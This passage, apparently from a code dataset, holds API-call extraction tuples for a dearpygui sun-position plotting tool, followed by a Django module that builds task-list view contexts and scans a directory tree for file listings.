18765), True, 'import datetime as dt\n'), ((18848, 18874), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['YEAR', 'yearm'], {}), '(YEAR, yearm)\n', (18861, 18874), True, 'import dearpygui.dearpygui as dpg\n'), ((18891, 18919), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['MONTH', 'monthm'], {}), '(MONTH, monthm)\n', (18904, 18919), True, 'import dearpygui.dearpygui as dpg\n'), ((18934, 18958), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['DAY', 'daym'], {}), '(DAY, daym)\n', (18947, 18958), True, 'import dearpygui.dearpygui as dpg\n'), ((18978, 19004), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['HOUR', 'hourm'], {}), '(HOUR, hourm)\n', (18991, 19004), True, 'import dearpygui.dearpygui as dpg\n'), ((19021, 19051), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['MINUTE', 'minutem'], {}), '(MINUTE, minutem)\n', (19034, 19051), True, 'import dearpygui.dearpygui as dpg\n'), ((19064, 19094), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['SECOND', 'secondm'], {}), '(SECOND, secondm)\n', (19077, 19094), True, 'import dearpygui.dearpygui as dpg\n'), ((1638, 1654), 'math.cos', 'math.cos', (['sun[0]'], {}), '(sun[0])\n', (1646, 1654), False, 'import math\n'), ((5461, 5477), 'math.cos', 'math.cos', (['sun[0]'], {}), '(sun[0])\n', (5469, 5477), False, 'import math\n'), ((7072, 7091), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['YEAR'], {}), '(YEAR)\n', (7085, 7091), True, 'import dearpygui.dearpygui as dpg\n'), ((7093, 7113), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['MONTH'], {}), '(MONTH)\n', (7106, 7113), True, 'import dearpygui.dearpygui as dpg\n'), ((7115, 7133), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['DAY'], {}), '(DAY)\n', (7128, 7133), True, 'import dearpygui.dearpygui as dpg\n'), ((7135, 7154), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['HOUR'], {}), '(HOUR)\n', (7148, 7154), True, 'import dearpygui.dearpygui as dpg\n'), ((7156, 7177), 'dearpygui.dearpygui.get_value', 'dpg.get_value', 
(['MINUTE'], {}), '(MINUTE)\n', (7169, 7177), True, 'import dearpygui.dearpygui as dpg\n'), ((7179, 7200), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['SECOND'], {}), '(SECOND)\n', (7192, 7200), True, 'import dearpygui.dearpygui as dpg\n'), ((7403, 7430), 'math.degrees', 'math.degrees', (['(azi - math.pi)'], {}), '(azi - math.pi)\n', (7415, 7430), False, 'import math\n'), ((7453, 7480), 'math.degrees', 'math.degrees', (['(azi + math.pi)'], {}), '(azi + math.pi)\n', (7465, 7480), False, 'import math\n'), ((7503, 7520), 'math.degrees', 'math.degrees', (['alt'], {}), '(alt)\n', (7515, 7520), False, 'import math\n'), ((7573, 7599), 'datetime.datetime.timestamp', 'dt.datetime.timestamp', (['tim'], {}), '(tim)\n', (7594, 7599), True, 'import datetime as dt\n'), ((9214, 9302), 'dearpygui.dearpygui.plot', 'dpg.plot', ([], {'tag': '(2210)', 'label': '"""Azimute do dia"""', 'height': '(312)', 'width': '(478)', 'anti_aliased': '(True)'}), "(tag=2210, label='Azimute do dia', height=312, width=478,\n anti_aliased=True)\n", (9222, 9302), True, 'import dearpygui.dearpygui as dpg\n'), ((9332, 9353), 'dearpygui.dearpygui.add_plot_legend', 'dpg.add_plot_legend', ([], {}), '()\n', (9351, 9353), True, 'import dearpygui.dearpygui as dpg\n'), ((9370, 9477), 'dearpygui.dearpygui.add_plot_axis', 'dpg.add_plot_axis', (['dpg.mvXAxis'], {'label': '"""Hora [h]"""', 'tag': '(2211)', 'parent': '(2210)', 'time': '(True)', 'no_tick_labels': '(True)'}), "(dpg.mvXAxis, label='Hora [h]', tag=2211, parent=2210,\n time=True, no_tick_labels=True)\n", (9387, 9477), True, 'import dearpygui.dearpygui as dpg\n'), ((9514, 9587), 'dearpygui.dearpygui.add_plot_axis', 'dpg.add_plot_axis', (['dpg.mvYAxis'], {'label': '"""Angulo [º]"""', 'tag': '(2212)', 'parent': '(2210)'}), "(dpg.mvYAxis, label='Angulo [º]', tag=2212, parent=2210)\n", (9531, 9587), True, 'import dearpygui.dearpygui as dpg\n'), ((9623, 9653), 'dearpygui.dearpygui.set_axis_limits_auto', 'dpg.set_axis_limits_auto', (['(2211)'], {}), 
'(2211)\n', (9647, 9653), True, 'import dearpygui.dearpygui as dpg\n'), ((9675, 9709), 'dearpygui.dearpygui.set_axis_limits', 'dpg.set_axis_limits', (['(2212)', '(-5)', '(370)'], {}), '(2212, -5, 370)\n', (9694, 9709), True, 'import dearpygui.dearpygui as dpg\n'), ((9736, 9807), 'dearpygui.dearpygui.add_line_series', 'dpg.add_line_series', (['[]', '[]'], {'tag': '(2213)', 'label': '"""Rota diária"""', 'parent': '(2212)'}), "([], [], tag=2213, label='Rota diária', parent=2212)\n", (9755, 9807), True, 'import dearpygui.dearpygui as dpg\n'), ((9843, 9917), 'dearpygui.dearpygui.add_scatter_series', 'dpg.add_scatter_series', (['[]', '[]'], {'tag': '(2214)', 'label': '"""Ponto atual"""', 'parent': '(2212)'}), "([], [], tag=2214, label='Ponto atual', parent=2212)\n", (9865, 9917), True, 'import dearpygui.dearpygui as dpg\n'), ((9960, 10049), 'dearpygui.dearpygui.plot', 'dpg.plot', ([], {'tag': '(2220)', 'label': '"""Altitude do dia"""', 'height': '(312)', 'width': '(478)', 'anti_aliased': '(True)'}), "(tag=2220, label='Altitude do dia', height=312, width=478,\n anti_aliased=True)\n", (9968, 10049), True, 'import dearpygui.dearpygui as dpg\n'), ((10079, 10186), 'dearpygui.dearpygui.add_plot_axis', 'dpg.add_plot_axis', (['dpg.mvXAxis'], {'label': '"""Hora [h]"""', 'tag': '(2221)', 'parent': '(2220)', 'time': '(True)', 'no_tick_labels': '(True)'}), "(dpg.mvXAxis, label='Hora [h]', tag=2221, parent=2220,\n time=True, no_tick_labels=True)\n", (10096, 10186), True, 'import dearpygui.dearpygui as dpg\n'), ((10223, 10296), 'dearpygui.dearpygui.add_plot_axis', 'dpg.add_plot_axis', (['dpg.mvYAxis'], {'label': '"""Angulo [º]"""', 'tag': '(2222)', 'parent': '(2220)'}), "(dpg.mvYAxis, label='Angulo [º]', tag=2222, parent=2220)\n", (10240, 10296), True, 'import dearpygui.dearpygui as dpg\n'), ((10332, 10362), 'dearpygui.dearpygui.set_axis_limits_auto', 'dpg.set_axis_limits_auto', (['(2221)'], {}), '(2221)\n', (10356, 10362), True, 'import dearpygui.dearpygui as dpg\n'), ((10384, 
10418), 'dearpygui.dearpygui.set_axis_limits', 'dpg.set_axis_limits', (['(2222)', '(-5)', '(100)'], {}), '(2222, -5, 100)\n', (10403, 10418), True, 'import dearpygui.dearpygui as dpg\n'), ((10445, 10466), 'dearpygui.dearpygui.add_plot_legend', 'dpg.add_plot_legend', ([], {}), '()\n', (10464, 10466), True, 'import dearpygui.dearpygui as dpg\n'), ((10483, 10554), 'dearpygui.dearpygui.add_line_series', 'dpg.add_line_series', (['[]', '[]'], {'tag': '(2223)', 'label': '"""Rota diária"""', 'parent': '(2222)'}), "([], [], tag=2223, label='Rota diária', parent=2222)\n", (10502, 10554), True, 'import dearpygui.dearpygui as dpg\n'), ((10590, 10664), 'dearpygui.dearpygui.add_scatter_series', 'dpg.add_scatter_series', (['[]', '[]'], {'tag': '(2224)', 'label': '"""Ponto atual"""', 'parent': '(2222)'}), "([], [], tag=2224, label='Ponto atual', parent=2222)\n", (10612, 10664), True, 'import dearpygui.dearpygui as dpg\n'), ((11233, 11286), 'dearpygui.dearpygui.menu_bar', 'dpg.menu_bar', ([], {'tag': '(2301)', 'label': '"""menubar para datetime"""'}), "(tag=2301, label='menubar para datetime')\n", (11245, 11286), True, 'import dearpygui.dearpygui as dpg\n'), ((11789, 11815), 'dearpygui.dearpygui.child_window', 'dpg.child_window', ([], {'tag': '(2310)'}), '(tag=2310)\n', (11805, 11815), True, 'import dearpygui.dearpygui as dpg\n'), ((11898, 11943), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Hora automática"""'}), "(default_value='Hora automática')\n", (11910, 11943), True, 'import dearpygui.dearpygui as dpg\n'), ((11963, 12100), 'dearpygui.dearpygui.add_drag_floatx', 'dpg.add_drag_floatx', ([], {'tag': '(231)', 'label': '"""Ano/Mes/Dia Auto"""', 'size': '(3)', 'format': '"""%.0f"""', 'speed': '(0.1)', 'min_value': '(1)', 'max_value': '(3000)', 'no_input': '(True)'}), "(tag=231, label='Ano/Mes/Dia Auto', size=3, format=\n '%.0f', speed=0.1, min_value=1, max_value=3000, no_input=True)\n", (11982, 12100), True, 'import dearpygui.dearpygui as dpg\n'), 
((12140, 12249), 'dearpygui.dearpygui.add_drag_floatx', 'dpg.add_drag_floatx', ([], {'tag': '(232)', 'label': '"""Hora/Min/Sec Auto"""', 'size': '(3)', 'format': '"""%.0f"""', 'speed': '(0.1)', 'no_input': '(True)'}), "(tag=232, label='Hora/Min/Sec Auto', size=3, format=\n '%.0f', speed=0.1, no_input=True)\n", (12159, 12249), True, 'import dearpygui.dearpygui as dpg\n'), ((12355, 12520), 'dearpygui.dearpygui.add_drag_int', 'dpg.add_drag_int', ([], {'tag': '(233)', 'label': '"""Valor no dia"""', 'format': '"""%.0f"""', 'speed': '(0.1)', 'min_value': '(0)', 'max_value': '(26 * 3600)', 'no_input': '(True)', 'source': 'TOT_SECONDS', 'enabled': '(False)'}), "(tag=233, label='Valor no dia', format='%.0f', speed=0.1,\n min_value=0, max_value=26 * 3600, no_input=True, source=TOT_SECONDS,\n enabled=False)\n", (12371, 12520), True, 'import dearpygui.dearpygui as dpg\n'), ((12570, 12728), 'dearpygui.dearpygui.add_drag_int', 'dpg.add_drag_int', ([], {'tag': '(234)', 'label': '"""Dia Juliano"""', 'format': '"""%.0f"""', 'speed': '(0.1)', 'min_value': '(0)', 'max_value': '(366)', 'no_input': '(True)', 'source': 'JULIANSDAY', 'enabled': '(False)'}), "(tag=234, label='Dia Juliano', format='%.0f', speed=0.1,\n min_value=0, max_value=366, no_input=True, source=JULIANSDAY, enabled=False\n )\n", (12586, 12728), True, 'import dearpygui.dearpygui as dpg\n'), ((12798, 12824), 'dearpygui.dearpygui.child_window', 'dpg.child_window', ([], {'tag': '(2320)'}), '(tag=2320)\n', (12814, 12824), True, 'import dearpygui.dearpygui as dpg\n'), ((12905, 12946), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Hora manual"""'}), "(default_value='Hora manual')\n", (12917, 12946), True, 'import dearpygui.dearpygui as dpg\n'), ((12966, 13109), 'dearpygui.dearpygui.add_input_floatx', 'dpg.add_input_floatx', ([], {'tag': '(236)', 'label': '"""Ano/Mes/Dia Manual"""', 'size': '(3)', 'default_value': '[2020, 12, 25]', 'format': '"""%.0f"""', 'min_value': '(1)', 'max_value': 
'(3000)'}), "(tag=236, label='Ano/Mes/Dia Manual', size=3,\n default_value=[2020, 12, 25], format='%.0f', min_value=1, max_value=3000)\n", (12986, 13109), True, 'import dearpygui.dearpygui as dpg\n'), ((13138, 13278), 'dearpygui.dearpygui.add_input_floatx', 'dpg.add_input_floatx', ([], {'tag': '(237)', 'label': '"""Hora/Min/Sec Manual"""', 'size': '(3)', 'default_value': '[20, 30, 10]', 'format': '"""%.0f"""', 'min_value': '(1)', 'max_value': '(60)'}), "(tag=237, label='Hora/Min/Sec Manual', size=3,\n default_value=[20, 30, 10], format='%.0f', min_value=1, max_value=60)\n", (13158, 13278), True, 'import dearpygui.dearpygui as dpg\n'), ((13310, 13475), 'dearpygui.dearpygui.add_drag_int', 'dpg.add_drag_int', ([], {'tag': '(238)', 'label': '"""Valor no dia"""', 'format': '"""%.0f"""', 'speed': '(0.1)', 'min_value': '(0)', 'max_value': '(24 * 3600)', 'no_input': '(True)', 'source': 'TOT_SECONDS', 'enabled': '(False)'}), "(tag=238, label='Valor no dia', format='%.0f', speed=0.1,\n min_value=0, max_value=24 * 3600, no_input=True, source=TOT_SECONDS,\n enabled=False)\n", (13326, 13475), True, 'import dearpygui.dearpygui as dpg\n'), ((13515, 13668), 'dearpygui.dearpygui.add_drag_int', 'dpg.add_drag_int', ([], {'tag': '(239)', 'label': '"""<NAME>"""', 'format': '"""%.0f"""', 'speed': '(0.1)', 'min_value': '(0)', 'max_value': '(366)', 'no_input': '(True)', 'source': 'JULIANSDAY', 'enabled': '(False)'}), "(tag=239, label='<NAME>', format='%.0f', speed=0.1,\n min_value=0, max_value=366, no_input=True, source=JULIANSDAY, enabled=False\n )\n", (13531, 13668), True, 'import dearpygui.dearpygui as dpg\n'), ((13712, 13731), 'dearpygui.dearpygui.hide_item', 'dpg.hide_item', (['(2320)'], {}), '(2320)\n', (13725, 13731), True, 'import dearpygui.dearpygui as dpg\n'), ((13779, 13798), 'dearpygui.dearpygui.hide_item', 'dpg.hide_item', (['(2310)'], {}), '(2310)\n', (13792, 13798), True, 'import dearpygui.dearpygui as dpg\n'), ((14007, 14034), 'dearpygui.dearpygui.child_window', 
'dpg.child_window', ([], {'height': '(90)'}), '(height=90)\n', (14023, 14034), True, 'import dearpygui.dearpygui as dpg\n'), ((14058, 14128), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Definições de longitude e latitude local"""'}), "(default_value='Definições de longitude e latitude local')\n", (14070, 14128), True, 'import dearpygui.dearpygui as dpg\n'), ((14382, 14398), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {}), '()\n', (14396, 14398), True, 'import dearpygui.dearpygui as dpg\n'), ((14704, 14732), 'dearpygui.dearpygui.child_window', 'dpg.child_window', ([], {'height': '(150)'}), '(height=150)\n', (14720, 14732), True, 'import dearpygui.dearpygui as dpg\n'), ((14793, 14841), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Informacoes do sol"""'}), "(default_value='Informacoes do sol')\n", (14805, 14841), True, 'import dearpygui.dearpygui as dpg\n'), ((14868, 14973), 'dearpygui.dearpygui.add_drag_float', 'dpg.add_drag_float', ([], {'label': '"""Azimute"""', 'tag': '(2312)', 'format': '"""%4.2f"""', 'speed': '(1)', 'no_input': '(True)', 'source': 'AZIMUTE'}), "(label='Azimute', tag=2312, format='%4.2f', speed=1,\n no_input=True, source=AZIMUTE)\n", (14886, 14973), True, 'import dearpygui.dearpygui as dpg\n'), ((15008, 15024), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {}), '()\n', (15022, 15024), True, 'import dearpygui.dearpygui as dpg\n'), ((15047, 15152), 'dearpygui.dearpygui.add_drag_float', 'dpg.add_drag_float', ([], {'label': '"""Altitude"""', 'tag': '(2313)', 'format': '"""%4.2f"""', 'speed': '(1)', 'no_input': '(True)', 'source': 'ZENITE'}), "(label='Altitude', tag=2313, format='%4.2f', speed=1,\n no_input=True, source=ZENITE)\n", (15065, 15152), True, 'import dearpygui.dearpygui as dpg\n'), ((15187, 15203), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {}), '()\n', (15201, 15203), True, 'import dearpygui.dearpygui as dpg\n'), ((15226, 15337), 
'dearpygui.dearpygui.add_drag_float', 'dpg.add_drag_float', ([], {'label': '"""Elevação (m)"""', 'tag': '(2314)', 'format': '"""%4.0f"""', 'speed': '(1)', 'no_input': '(True)', 'source': 'ALTITUDE'}), "(label='Elevação (m)', tag=2314, format='%4.0f', speed=1,\n no_input=True, source=ALTITUDE)\n", (15244, 15337), True, 'import dearpygui.dearpygui as dpg\n'), ((15367, 15383), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {}), '()\n', (15381, 15383), True, 'import dearpygui.dearpygui as dpg\n'), ((15406, 15499), 'dearpygui.dearpygui.add_drag_floatx', 'dpg.add_drag_floatx', ([], {'label': '"""Horas de sol"""', 'tag': '(2315)', 'size': '(3)', 'format': '"""%.0f"""', 'no_input': '(True)'}), "(label='Horas de sol', tag=2315, size=3, format='%.0f',\n no_input=True)\n", (15425, 15499), True, 'import dearpygui.dearpygui as dpg\n'), ((15581, 15609), 'dearpygui.dearpygui.child_window', 'dpg.child_window', ([], {'height': '(200)'}), '(height=200)\n', (15597, 15609), True, 'import dearpygui.dearpygui as dpg\n'), ((15671, 15722), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Posicoes de interesse"""'}), "(default_value='Posicoes de interesse')\n", (15683, 15722), True, 'import dearpygui.dearpygui as dpg\n'), ((15751, 15805), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Nascer do sol (hh/mm/ss)"""'}), "(default_value='Nascer do sol (hh/mm/ss)')\n", (15763, 15805), True, 'import dearpygui.dearpygui as dpg\n'), ((16021, 16037), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {}), '()\n', (16035, 16037), True, 'import dearpygui.dearpygui as dpg\n'), ((16060, 16111), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Culminante (hh/mm/ss)"""'}), "(default_value='Culminante (hh/mm/ss)')\n", (16072, 16111), True, 'import dearpygui.dearpygui as dpg\n'), ((16330, 16346), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {}), '()\n', (16344, 16346), True, 'import 
dearpygui.dearpygui as dpg\n'), ((16369, 16420), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Por do sol (hh/mm/ss)"""'}), "(default_value='Por do sol (hh/mm/ss)')\n", (16381, 16420), True, 'import dearpygui.dearpygui as dpg\n'), ((467, 480), 'math.cos', 'math.cos', (['ang'], {}), '(ang)\n', (475, 480), False, 'import math\n'), ((501, 514), 'math.sin', 'math.sin', (['ang'], {}), '(ang)\n', (509, 514), False, 'import math\n'), ((1447, 1458), 'math.cos', 'math.cos', (['x'], {}), '(x)\n', (1455, 1458), False, 'import math\n'), ((1670, 1686), 'math.sin', 'math.sin', (['sun[0]'], {}), '(sun[0])\n', (1678, 1686), False, 'import math\n'), ((1687, 1703), 'math.cos', 'math.cos', (['sun[1]'], {}), '(sun[1])\n', (1695, 1703), False, 'import math\n'), ((5266, 5277), 'math.cos', 'math.cos', (['x'], {}), '(x)\n', (5274, 5277), False, 'import math\n'), ((5493, 5509), 'math.sin', 'math.sin', (['sun[0]'], {}), '(sun[0])\n', (5501, 5509), False, 'import math\n'), ((5510, 5526), 'math.cos', 'math.cos', (['sun[1]'], {}), '(sun[1])\n', (5518, 5526), False, 'import math\n'), ((13738, 13764), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['HORA_MANUAL'], {}), '(HORA_MANUAL)\n', (13751, 13764), True, 'import dearpygui.dearpygui as dpg\n'), ((18161, 18180), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['YEAR'], {}), '(YEAR)\n', (18174, 18180), True, 'import dearpygui.dearpygui as dpg\n'), ((18182, 18202), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['MONTH'], {}), '(MONTH)\n', (18195, 18202), True, 'import dearpygui.dearpygui as dpg\n'), ((18205, 18223), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['DAY'], {}), '(DAY)\n', (18218, 18223), True, 'import dearpygui.dearpygui as dpg\n'), ((18289, 18308), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['HOUR'], {}), '(HOUR)\n', (18302, 18308), True, 'import dearpygui.dearpygui as dpg\n'), ((18310, 18331), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['MINUTE'], {}), '(MINUTE)\n', 
(18323, 18331), True, 'import dearpygui.dearpygui as dpg\n'), ((18333, 18354), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['SECOND'], {}), '(SECOND)\n', (18346, 18354), True, 'import dearpygui.dearpygui as dpg\n'), ((1474, 1485), 'math.sin', 'math.sin', (['x'], {}), '(x)\n', (1482, 1485), False, 'import math\n'), ((1486, 1497), 'math.cos', 'math.cos', (['y'], {}), '(y)\n', (1494, 1497), False, 'import math\n'), ((2082, 2109), 'math.cos', 'math.cos', (['(azi - math.pi / 2)'], {}), '(azi - math.pi / 2)\n', (2090, 2109), False, 'import math\n'), ((2121, 2148), 'math.sin', 'math.sin', (['(azi - math.pi / 2)'], {}), '(azi - math.pi / 2)\n', (2129, 2148), False, 'import math\n'), ((2327, 2354), 'math.cos', 'math.cos', (['(alt - math.pi / 2)'], {}), '(alt - math.pi / 2)\n', (2335, 2354), False, 'import math\n'), ((2366, 2393), 'math.sin', 'math.sin', (['(alt - math.pi / 2)'], {}), '(alt - math.pi / 2)\n', (2374, 2393), False, 'import math\n'), ((5293, 5304), 'math.sin', 'math.sin', (['x'], {}), '(x)\n', (5301, 5304), False, 'import math\n'), ((5305, 5316), 'math.cos', 'math.cos', (['y'], {}), '(y)\n', (5313, 5316), False, 'import math\n'), ((5809, 5836), 'math.cos', 'math.cos', (['(azi - math.pi / 2)'], {}), '(azi - math.pi / 2)\n', (5817, 5836), False, 'import math\n'), ((5848, 5875), 'math.sin', 'math.sin', (['(azi - math.pi / 2)'], {}), '(azi - math.pi / 2)\n', (5856, 5875), False, 'import math\n'), ((5972, 5999), 'math.cos', 'math.cos', (['(alt - math.pi / 2)'], {}), '(alt - math.pi / 2)\n', (5980, 5999), False, 'import math\n'), ((6011, 6038), 'math.sin', 'math.sin', (['(alt - math.pi / 2)'], {}), '(alt - math.pi / 2)\n', (6019, 6038), False, 'import math\n'), ((11399, 11432), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['HORA_MANUAL', '(False)'], {}), '(HORA_MANUAL, False)\n', (11412, 11432), True, 'import dearpygui.dearpygui as dpg\n'), ((11644, 11676), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['HORA_MANUAL', '(True)'], {}), '(HORA_MANUAL, 
True)\n', (11657, 11676), True, 'import dearpygui.dearpygui as dpg\n')] |
import os, time, mimetypes, glob
from django.utils.translation import gettext_lazy as _
from django.urls import reverse
from task.const import *
from task.models import Task, detect_group
from rusel.base.config import Config
from rusel.base.forms import CreateGroupForm
from rusel.context import get_base_context
from rusel.utils import extract_get_params
class Context:
def set_config(self, config, cur_view):
self.config = Config(config, cur_view)
def get_app_context(self, user_id, search_qty=None, icon=None, nav_items=None, **kwargs):
context = {}
if hasattr(self, 'object') and self.object:
title = self.object.name
else:
if 'title' in kwargs:
title = kwargs['title']
else:
title = _(self.config.title).capitalize()
nav_item = None
if (Task.get_nav_role(self.config.app) != self.config.get_cur_role()):
nav_item = Task.get_active_nav_item(user_id, self.config.app)
if nav_item:
title = (title, nav_item.name)
context['nav_item'] = nav_item
context.update(get_base_context(self.request, self.config.app, self.config.get_cur_role(), self.config.cur_view_group, (hasattr(self, 'object') and self.object != None), title, icon=icon))
context['fix_list'] = self.get_fixes(self.config.views, search_qty)
context['group_form'] = CreateGroupForm()
context['config'] = self.config
context['params'] = extract_get_params(self.request, self.config.group_entity)
if nav_items:
context['nav_items'] = nav_items
context['add_item_placeholder'] = '{} {}'.format(_('add').capitalize(), self.config.item_name if self.config.item_name else self.config.get_cur_role())
if self.config.add_button:
context['add_item_template'] = 'base/add_item_button.html'
else:
context['add_item_template'] = 'base/add_item_input.html'
if (self.config.group_entity in self.request.GET):
context['current_group'] = self.request.GET[self.config.group_entity]
elif ('ret' in self.request.GET):
context['current_group'] = self.request.GET['ret']
return context
def get_sorts(self, sorts):
ret = []
for sort in sorts:
ret.append({'id': sort[0], 'name': _(sort[1]).capitalize()})
return ret
def get_fixes(self, views, search_qty):
fixes = []
if (self.config.app == APP_ALL):
common_url = reverse('index')
else:
common_url = reverse(self.config.app + ':list')
nav_item=Task.get_active_nav_item(self.request.user.id, self.config.app)
for key, value in views.items():
url = common_url
determinator = 'view'
view_id = self.config.main_view
if (view_id != key):
if ('role' in value):
determinator = 'role'
view_id = value['role']
url += view_id + '/'
else:
view_id = key
if (key != self.config.main_view):
if ('page_url' in value):
url += value['page_url'] + '/'
else:
url += '?view=' + key
if (self.config.app in FOLDER_NAV_APPS):
folder = ''
if ('folder' in self.request.GET):
folder = self.request.GET['folder']
if folder:
if ('?' in url):
url += '&'
else:
url += '?'
url += 'folder=' + folder
hide_qty = False
if ('hide_qty' in value):
hide_qty = value['hide_qty']
if hide_qty:
qty = None
else:
if (view_id == self.config.group_entity):
_nav_item = None
else:
_nav_item = nav_item
fix_group = detect_group(self.request.user, self.config.app, determinator, view_id, _(value['title']).capitalize())
qty = self.get_view_qty(fix_group, _nav_item)
active = (self.config.cur_view_group.determinator == determinator) and (self.config.cur_view_group.view_id == view_id)
fix = {
'determinator': determinator,
'id': view_id,
'url': url,
'icon': value['icon'],
'title': _(value['title']).capitalize(),
'qty': qty,
'active': active,
'search_qty': search_qty,
}
fixes.append(fix)
return fixes
def get_view_qty(self, group, nav_item):
data = self.get_dataset(group, nav_item=nav_item)
return len(data)
def get_dataset(self, group, query=None, nav_item=None):
if (group.determinator == 'role'):
cur_role = group.view_id
else:
cur_role = self.config.base_role
data = Task.get_role_tasks(self.request.user.id, self.config.app, cur_role, nav_item)
if (self.config.app == APP_ALL) and (not query):
return data
if data and ((not group.determinator) or (group.determinator == 'group')):
data = data.filter(groups__id=group.id)
# if (not group.completed):
# data = data.filter(completed=False)
if hasattr(self, 'tune_dataset'):
return self.tune_dataset(data, group)
return data
def get_nav_items(self):
nav_role = Task.get_nav_role(self.config.app)
if (not nav_role) or (nav_role == self.config.cur_view_group.view_id):
return None
href = self.request.path
if ('pk' in self.kwargs):
pk = str(self.kwargs['pk']) + '/'
if (pk in href):
href = href.split(pk)[0]
sort = 'name'
nav_item_group = detect_group(self.request.user, self.config.app, 'role', nav_role, '')
if nav_item_group and nav_item_group.items_sort:
sort = nav_item_group.items_sort
ret = []
for item in Task.get_role_tasks(self.request.user.id, self.config.app, nav_role).order_by(sort):
ret.append({
'id': item.id,
'name': item.name,
'qty': len(Task.get_role_tasks(self.request.user.id, self.config.app, self.config.cur_view_group.view_id, item)),
'href': href,
})
return ret
class DirContext(Context):
def get_context_data(self, **kwargs):
self.config.set_view(self.request)
self.object = None
self.cur_folder = ''
page_title = ''
title = ''
if ('folder' in self.request.GET):
self.cur_folder = self.request.GET['folder']
page_title = self.cur_folder.split('/')[-1:][0]
title = self.cur_folder
if not self.cur_folder:
page_title = _(self.config.app_title)
title = page_title
kwargs.update({'title': page_title})
dir_tree = []
self.scan_dir_tree(dir_tree, self.cur_folder, self.store_dir.rstrip('/'))
self.scan_files()
self.object = None
context = super().get_context_data(**kwargs)
upd_context = self.get_app_context(self.request.user.id, None, icon=self.config.view_icon, nav_items=None, **kwargs)
context.update(upd_context)
context['title'] = title
context['dir_tree'] = dir_tree
context['file_list'] = self.file_list
context['gps_data'] = self.gps_data
if (self.config.cur_view_group.determinator == 'view') and (self.config.cur_view_group.view_id != self.config.main_view):
context['cur_view'] = self.config.cur_view_group.view_id
context['theme_id'] = 24
context['cur_folder'] = self.cur_folder
return context
def scan_dir_tree(self, dir_tree, cur_folder, path, parent=None, demo=False):
ld = glob.glob(path + '/*/')
if not len(ld):
return
node = ''
level = 0
if parent:
node = parent['node']
if node:
node += '/'
node += parent['name']
level = parent['level'] + 1
s_node = node
if node:
s_node = node + '/'
p = path
for d in ld:
dd = d.replace('\\', '/')
name = dd.split(p)[1].strip('/')
x = {
'node': node,
'name': name,
'active': (cur_folder == s_node + name),
'level': level,
'qty': 0,
}
dir_tree.append(x)
if not demo:
self.scan_dir_tree(dir_tree, cur_folder, path + '/' + name, x)
def scan_files(self):
self.gps_data = []
self.file_list = []
with os.scandir(self.store_dir + self.cur_folder) as it:
for entry in it:
if (entry.name.upper() == 'Thumbs.db'.upper()):
continue
if entry.is_dir():
continue
ff = self.store_dir + self.cur_folder + '/' + entry.name
mt = mimetypes.guess_type(ff)
file_type = ''
if mt and mt[0]:
file_type = mt[0]
self.file_list.append({
'name': entry.name,
'href': 'file/?folder=' + self.cur_folder + '&file=' + entry.name,
'date': time.ctime(os.path.getmtime(ff)),
'type': file_type,
'size': self.sizeof_fmt(os.path.getsize(ff)),
})
return self.gps_data
def sizeof_fmt(self, num, suffix='B'):
for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return f'{num:3.1f}{unit}{suffix}'
num /= 1024.0
return f'{num:.1f}Yi{suffix}'
| [
"os.path.getsize",
"task.models.detect_group",
"rusel.base.forms.CreateGroupForm",
"django.utils.translation.gettext_lazy",
"task.models.Task.get_role_tasks",
"rusel.base.config.Config",
"rusel.utils.extract_get_params",
"os.scandir",
"django.urls.reverse",
"mimetypes.guess_type",
"os.path.getmt... | [((438, 462), 'rusel.base.config.Config', 'Config', (['config', 'cur_view'], {}), '(config, cur_view)\n', (444, 462), False, 'from rusel.base.config import Config\n'), ((1433, 1450), 'rusel.base.forms.CreateGroupForm', 'CreateGroupForm', ([], {}), '()\n', (1448, 1450), False, 'from rusel.base.forms import CreateGroupForm\n'), ((1519, 1577), 'rusel.utils.extract_get_params', 'extract_get_params', (['self.request', 'self.config.group_entity'], {}), '(self.request, self.config.group_entity)\n', (1537, 1577), False, 'from rusel.utils import extract_get_params\n'), ((2673, 2736), 'task.models.Task.get_active_nav_item', 'Task.get_active_nav_item', (['self.request.user.id', 'self.config.app'], {}), '(self.request.user.id, self.config.app)\n', (2697, 2736), False, 'from task.models import Task, detect_group\n'), ((5185, 5263), 'task.models.Task.get_role_tasks', 'Task.get_role_tasks', (['self.request.user.id', 'self.config.app', 'cur_role', 'nav_item'], {}), '(self.request.user.id, self.config.app, cur_role, nav_item)\n', (5204, 